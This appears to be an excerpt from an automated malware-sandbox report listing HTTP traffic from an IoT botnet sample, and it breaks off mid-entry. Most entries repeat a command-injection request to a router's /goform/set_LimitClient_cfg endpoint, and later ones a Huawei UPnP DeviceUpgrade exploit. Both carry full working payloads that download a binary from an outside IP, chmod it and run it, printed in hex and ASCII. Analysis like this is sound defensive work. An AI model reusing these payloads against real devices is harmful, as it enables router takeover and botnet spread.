                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 